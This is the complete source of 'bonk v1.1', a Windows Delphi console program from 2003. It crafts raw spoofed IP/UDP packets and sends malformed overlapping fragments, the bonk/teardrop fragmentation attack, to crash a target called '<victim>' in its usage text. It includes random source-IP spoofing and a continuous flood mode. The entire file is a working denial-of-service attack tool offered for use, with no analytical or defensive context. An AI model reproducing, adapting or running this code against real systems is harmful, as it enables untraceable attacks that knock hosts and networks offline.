{
  ************************************************************************
  *                                                                      *
  *    bonk v1.1                                                         *
  *                                                                      *
  *    Release Date: 10 Aug 2003                                         *
  *                                                                      *
  *    http://www.loranbase.com                                          *
  *                                                                      *
  ************************************************************************
}

program bonk;

{$APPTYPE CONSOLE}

uses
  Windows, Winsock;

const
  Banner = #13#10'bonk v1.1 [10 Aug 2003]'#13#10#13#10 +
                 'http://www.loranbase.com'#13#10;

type
  TBonkOptions = packed record
    DstPort, SrcPort: Word;
    Delay, Num, Sended, Source: Cardinal;
    SockAddr: TSockAddrIn;
    Socket: TSocket;
    RandomSeek: Integer;
  end;

  WordArray = ^TWordArray;
  TWordArray = array [0..0] of Word;

  PIPhdr = ^TIPhdr;
  TIPhdr = packed record
    ip_verlen: Byte;
    ip_tos: Byte;
    ip_len: Word;
    ip_id: Word;
    ip_off: Word;
    ip_ttl: Byte;
    ip_p: Byte;
    ip_sum: Word;
    ip_src: Cardinal;
    ip_dst: Cardinal;
  end;

  PUDPHdr = ^TUDPHdr;
  TUDPHdr = packed record
    udp_sport: Word;
    udp_dport: Word;
    udp_ulen: Word;
    udp_sum: Word;
  end;

  Ppseudohdr_udp = ^Tpseudohdr_udp;
  Tpseudohdr_udp = packed record
    saddr: Cardinal;
    daddr: Cardinal;
    zero: Byte;
    protocol: Byte;
    length: Word;
    udphdr: TUDPhdr;
  end;

const
  Len = 28 + $1c;

var
  WSAData: TWSAData;
  UseDelay: Boolean;
  BonkOpt: TBonkOptions;
  LastUpdate: Cardinal = 0;
  Buf: array [0..Len - 1] of Char;
  IPhdr: PIPhdr = @Buf[0];
  UDPhdr: PUDPhdr = @Buf[20];
  
function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;
begin
  Result := Force or ((GetTickCount - LastUpdate) >= DelayValue);
  if Result then LastUpdate := GetTickCount;
end;

function StrtoInt(const S: string): integer;
var
  E: integer;
begin
  Val(S, Result, E);
end;

function InttoStr(const Value: integer): string;
var
  S: string[11];
begin
  Str(Value, S);
  Result := S;
end;

function StrToIntDef(const S: string; Default: integer): integer;
var
  E: integer;
begin
  Val(S, Result, E);
  if E <> 0 then Result := Default;
end;

function ExtractFileName(const Path: string): string;
var
  i, L: integer;
  Ch: Char;
begin
  L := Length(Path);
  for i := L downto 1 do
  begin
    Ch := Path[i];
    if (Ch = '\') or (Ch = '/') then
    begin
      Result := Copy(Path, i + 1, L - i);
      Break;
    end;
  end;
end;

function CheckSum(Data: WordArray; Size: integer): Word;
var
  i, Sum: integer;
  Answer: Word;
begin
  Sum := 0;
  i := 0;
  while (Size > 1) do begin
    Sum := Sum + Data^[i];
    Dec(Size, 2);
    Inc(i);
  end;
  if (Size <> 0) then Sum := Sum + Data^[i];
  Sum := (Sum shr 16) + (Sum and $ffff);
  Sum := Sum + (Sum shr 16);
  Answer := not Sum;
  Result := Answer;
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  BonkOpt.RandomSeek := (BonkOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor BonkOpt.RandomSeek) mod Range;
end;

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket;
begin
  BonkOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if BonkOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(BonkOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

procedure SendBonk;

  procedure SendBonk_SetIPhdr;
  begin
    IPhdr.ip_verlen := $45;
    IPhdr.ip_tos := 0;
    IPhdr.ip_len := htons(Len);
    IPhdr.ip_id := htons($455);
    IPhdr.ip_off := htons($2000);
    IPhdr.ip_ttl := 255;
    IPhdr.ip_p := 17;
    if BonkOpt.Source = 0 then
      IPhdr.ip_src := GetRandomIP
    else
      IPhdr.ip_src := BonkOpt.Source;
    IPhdr.ip_dst := BonkOpt.SockAddr.sin_addr.S_addr;
  end;

  procedure SendBonk_SetUDPhdr;
  begin
    if BonkOpt.SrcPort = 0 then
      UDPhdr.udp_sport := GetRandomValue(High(Word)) + 1
    else
      UDPhdr.udp_sport := htons(BonkOpt.SrcPort);
    if BonkOpt.DstPort = 0 then
      UDPhdr.udp_dport := GetRandomValue(High(Word)) + 1
    else
      UDPhdr.udp_dport := htons(BonkOpt.DstPort);
    UDPhdr.udp_ulen := htons(8 + $1c);
  end;

begin
  FillChar(Buf, Sizeof(Buf), 0);
  SendBonk_SetIPhdr;
  SendBonk_SetUDPhdr;
  Sendto(BonkOpt.Socket, Buf, Len, 0, BonkOpt.SockAddr, Sizeof(BonkOpt.SockAddr));
  IPhdr.ip_len := htons(23);
  IPhdr.ip_off := htons(4);
  Sendto(BonkOpt.Socket, Buf, 24, 0, BonkOpt.SockAddr, Sizeof(BonkOpt.SockAddr));
end;

procedure SetDefaultOptions;
begin
  BonkOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  BonkOpt.SockAddr.sin_family := AF_INET;
  BonkOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1;
end;

procedure SetParams;
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    case Ch of
      'p': BonkOpt.DstPort := StrtoIntDef(ParamStr(i + 1), 0);
      'S': BonkOpt.Source := Resolve(PChar(ParamStr(i + 1)));
      's': BonkOpt.SrcPort := StrtoIntDef(ParamStr(i + 1), 0);
      'n': BonkOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': BonkOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -S    Spoof host     (0 is random (default))'#13#10 +
        '  -s:   Src port       (0 is random (default))'#13#10 +
        '  -p:   Dst port       (0 is random (default))'#13#10 +
        '  -n:   Num of packets (0 is continuous (default))'#13#10 +
        '  -d:   Delay (in ms)  (default 0)'#13#10
       );
  Halt(0);
end;
  
begin
  Writeln(Banner);
  if ParamCount < 1 then
    Usage(ExtractFileName(ParamStr(0)));
  WSAStartUp($0101, WSAData);
  FillChar(BonkOpt, Sizeof(BonkOpt), 0);
  CreateSocket;
  try
    Randomize;
    SetDefaultOptions;
    if ParamCount > 1 then
      SetParams;
    UseDelay := BonkOpt.Delay > 0;
    repeat
      SendBonk;
      Inc(BonkOpt.Sended);
      if CanUpdate(50, BonkOpt.Sended = BonkOpt.Num) then
        SetConsoleTitle(PChar('Count: ' + InttoStr(BonkOpt.Sended)));
      if UseDelay then
        Sleep(BonkOpt.Delay);
    until
      BonkOpt.Sended = BonkOpt.Num;
  finally
    CloseSocket(BonkOpt.Socket);
    WSACleanUp;
  end;
end.

